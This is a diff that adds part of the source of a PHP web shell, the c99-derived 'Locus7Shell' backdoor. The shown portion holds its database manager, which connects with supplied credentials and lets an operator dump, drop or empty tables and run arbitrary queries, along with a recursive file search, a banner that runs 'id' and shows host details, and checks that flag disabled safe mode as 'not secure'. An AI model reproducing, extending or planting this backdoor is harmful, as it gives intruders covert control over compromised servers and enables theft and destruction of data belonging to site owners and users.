+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; 
+  if ($tbl_struct) 
+  { 
+   echo "<td valign=\"top\"><b>Fields:</b><br>"; 
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} 
+   echo "</td></tr></table>"; 
+  } 
+ } 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} 
+} 
+} 
+if (!function_exists("mysql_create_db")) 
+{ 
+function mysql_create_db($db,$sock="") 
+{ 
+ $sql = "CREATE DATABASE `".addslashes($db)."`;"; 
+ if ($sock) {return mysql_query($sql,$sock);} 
+ else {return mysql_query($sql);} 
+} 
+} 
+if (!function_exists("mysql_query_parse")) 
+{ 
+function mysql_query_parse($query) 
+{ 
+ $query = trim($query); 
+ $arr = explode (" ",$query); 
+ /*array array() 
+ { 
+  "METHOD"=>array(output_type), 
+  "METHOD1"... 
+  ... 
+ } 
+ if output_type == 0, no output, 
+ if output_type == 1, no output if no error 
+ if output_type == 2, output without control-buttons 
+ if output_type == 3, output with control-buttons 
+ */ 
+ $types = array( 
+  "SELECT"=>array(3,1), 
+  "SHOW"=>array(2,1), 
+  "DELETE"=>array(1), 
+  "DROP"=>array(1) 
+ ); 
+ $result = array(); 
+ $op = strtoupper($arr[0]); 
+ if (is_array($types[$op])) 
+ { 
+  $result["propertions"] = $types[$op]; 
+  $result["query"]  = $query; 
+  if ($types[$op] == 2) 
+  { 
+   foreach($arr as $k=>$v) 
+   { 
+    if (strtoupper($v) == "LIMIT") 
+    { 
+     $result["limit"] = $arr[$k+1]; 
+     $result["limit"] = explode(",",$result["limit"]); 
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} 
+     unset($arr[$k],$arr[$k+1]); 
+    } 
+   } 
+  } 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99fsearch")) 
+{ 
+function c99fsearch($d) 
+{ 
+ global $found; 
+ global $found_d; 
+ global $found_f; 
+ global $search_i_f; 
+ global $search_i_d; 
+ global $a; 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($f = readdir($h)) !== FALSE) 
+ { 
+  if($f != "." && $f != "..") 
+  { 
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); 
+   if (is_dir($d.$f)) 
+   { 
+    $search_i_d++; 
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} 
+    if (!is_link($d.$f)) {c99fsearch($d.$f);} 
+   } 
+   else 
+   { 
+    $search_i_f++; 
+    if ($bool) 
+    { 
+     if (!empty($a["text"])) 
+     { 
+      $r = @file_get_contents($d.$f); 
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} 
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} 
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} 
+      else {$bool = strpos(" ".$r,$a["text"],1);} 
+      if ($a["text_not"]) {$bool = !$bool;} 
+      if ($bool) {$found[] = $d.$f; $found_f++;} 
+     } 
+     else {$found[] = $d.$f; $found_f++;} 
+    } 
+   } 
+  } 
+ } 
+ closedir($h); 
+} 
+} 
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} 
+//Sending headers 
+@ob_start(); 
+@ob_implicit_flush(0); 
+function onphpshutdown() 
+{ 
+ global $gzipencode,$ft; 
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) 
+ { 
+  $v = @ob_get_contents(); 
+  @ob_end_clean(); 
+  @ob_start("ob_gzHandler"); 
+  echo $v; 
+  @ob_end_flush(); 
+ } 
+} 
+function c99shexit() 
+{ 
+ onphpshutdown(); 
+ exit; 
+} 
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); 
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); 
+header("Cache-Control: no-store, no-cache, must-revalidate"); 
+header("Cache-Control: post-check=0, pre-check=0", FALSE); 
+header("Pragma: no-cache"); 
+if (empty($tmpdir)) 
+{ 
+ $tmpdir = ini_get("upload_tmp_dir"); 
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} 
+} 
+$tmpdir = realpath($tmpdir); 
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); 
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} 
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} 
+else {$tmpdir_logs = realpath($tmpdir_logs);} 
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") 
+{ 
+ $safemode = TRUE; 
+ $hsafemode = "<font color=red>ON (secure)</font>"; 
+} 
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} 
+$v = @ini_get("open_basedir"); 
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} 
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} 
+$sort = htmlspecialchars($sort); 
+if (empty($sort)) {$sort = $sort_default;} 
+$sort[1] = strtolower($sort[1]); 
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); 
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} 
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); 
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF 
+@ini_set("highlight.comment",$highlight_comment); //#FF8000 
+@ini_set("highlight.default",$highlight_default); //#0000BB 
+@ini_set("highlight.html",$highlight_html); //#000000 
+@ini_set("highlight.keyword",$highlight_keyword); //#007700 
+@ini_set("highlight.string",$highlight_string); //#DD0000 
+if (!is_array($actbox)) {$actbox = array();} 
+$dspact = $act = htmlspecialchars($act); 
+$disp_fullpath = $ls_arr = $notls = null; 
+$ud = urlencode($d); 
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - Locus7Shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #009900; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #009900; scrollbar-shadow-color: #000000; scrollbar-highlight-color: #00CC00; scrollbar-3dlight-color: #00CC00; scrollbar-darkshadow-color: #009900; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #000000; COLOR: green; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #009900; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #f89521; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #f89521; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #f89521; TEXT-DECORATION: none;}A:hover { COLOR: #f89521; TEXT-DECORATION: bold;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #009900; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #009900;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><center><img src="http://img244.imageshack.us/img244/6663/locus7sgm8.jpg"></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+$d = str_replace("\\\\","\\",$d); 
+$dispd = htmlspecialchars($d); 
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); 
+$i = 0; 
+foreach($pd as $b) 
+{ 
+ $t = ""; 
+ $j = 0; 
+ foreach ($e as $r) 
+ { 
+  $t.= $r.DIRECTORY_SEPARATOR; 
+  if ($j == $i) {break;} 
+  $j++; 
+ } 
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; 
+ $i++; 
+} 
+echo "&nbsp;&nbsp;&nbsp;"; 
+if (is_writable($d)) 
+{ 
+ $wd = TRUE; 
+ $wdt = "<font color=green>[ ok ]</font>"; 
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; 
+} 
+else 
+{ 
+ $wd = FALSE; 
+ $wdt = "<font color=red>[ Read-Only ]</font>"; 
+ echo "<b>".view_perms_color($d)."</b>"; 
+} 
+if (is_callable("disk_free_space")) 
+{ 
+ $free = disk_free_space($d); 
+ $total = disk_total_space($d); 
+ if ($free === FALSE) {$free = 0;} 
+ if ($total === FALSE) {$total = 0;} 
+ if ($free < 0) {$free = 0;} 
+ if ($total < 0) {$total = 0;} 
+ $used = $total-$free; 
+ $free_percent = round(100/($total/$free),2); 
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; 
+} 
+echo "<br>";
+echo "<b>Your ip: <a href=http://whois.domaintools.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://whois.domaintools.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>"; 
+$letters = ""; 
+if ($win) 
+{ 
+ $v = explode("\\",$d); 
+ $v = $v[0]; 
+ foreach (range("a","z") as $letter) 
+ { 
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes); 
+  if (!$bool) {$bool = is_dir($letter.":\\");} 
+  if ($bool) 
+  { 
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; 
+   if ($letter.":" != $v) {$letters .= $letter;} 
+   else {$letters .= "<font color=green>".$letter."</font>";} 
+   $letters .= " ]</a> "; 
+  } 
+ } 
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} 
+} 
+if (count($quicklaunch) > 0) 
+{ 
+ foreach($quicklaunch as $item) 
+ { 
+  $item[1] = str_replace("%d",urlencode($d),$item[1]); 
+  $item[1] = str_replace("%sort",$sort,$item[1]); 
+  $v = realpath($d.".."); 
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} 
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]); 
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; 
+ } 
+} 
+echo "</p></td></tr></table><br>"; 
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} 
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; 
+if ($act == "") {$act = $dspact = "ls";} 
+if ($act == "sql") 
+{ 
+ $sql_surl = $surl."act=sql"; 
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} 
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} 
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} 
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} 
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} 
+ $sql_surl .= "&"; 
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php 
+ if ($sql_server) 
+ { 
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); 
+  $err = mysql_smarterror(); 
+  @mysql_select_db($sql_db,$sql_sock); 
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} 
+ } 
+ else {$sql_sock = FALSE;} 
+ echo "<b>SQL Manager:</b><br>"; 
+ if (!$sql_sock) 
+ { 
+  if (!$sql_server) {echo "NO CONNECTION";} 
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} 
+ } 
+ else 
+ { 
+  $sqlquicklaunch = array(); 
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); 
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); 
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); 
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); 
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); 
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql"); 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; 
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} 
+  echo "</center>"; 
+ } 
+ echo "</td></tr><tr>"; 
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } 
+ else 
+ { 
+  //Start left panel 
+  if (!empty($sql_db)) 
+  { 
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_tables($sql_db); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; 
+    $c = 0; 
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} 
+    if (!$c) {echo "No tables found in database.";} 
+   } 
+  } 
+  else 
+  { 
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_dbs($sql_sock); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php 
+    $c = 0; 
+    $dbs = ""; 
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} 
+    echo "<option value=\"\">Databases (".$c.")</option>"; 
+    echo $dbs; 
+   } 
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php 
+  } 
+  //End left panel 
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; 
+  //Start center panel 
+  $diplay = TRUE; 
+  if ($sql_db) 
+  { 
+   if (!is_numeric($c)) {$c = 0;} 
+   if ($c == 0) {$c = "no";} 
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; 
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} 
+   echo "</b></center>"; 
+   $acts = array("","dump"); 
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} 
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} 
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} 
+   elseif ($sql_tbl_act == "insert") 
+   { 
+    if ($sql_tbl_insert_radio == 1) 
+    { 
+     $keys = ""; 
+     $akeys = array_keys($sql_tbl_insert); 
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} 
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} 
+     $values = ""; 
+     $i = 0; 
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} 
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} 
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+    elseif ($sql_tbl_insert_radio == 2) 
+    { 
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); 
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; 
+     $result = mysql_query($sql_query) or print(mysql_smarterror()); 
+     $result = mysql_fetch_array($result, MYSQL_ASSOC); 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+   } 
+   if ($sql_act == "query") 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} 
+   } 
+   if (in_array($sql_act,$acts)) 
+   { 
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php 
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} 
+    if ($sql_act == "newtbl") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; 
+    } 
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+   } 
+   elseif ($sql_act == "dump") 
+   { 
+    if (empty($submit)) 
+    { 
+     $diplay = FALSE; 
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; 
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; 
+     $v = join (";",$dmptbls); 
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; 
+     if ($dump_file) {$tmp = $dump_file;} 
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} 
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; 
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; 
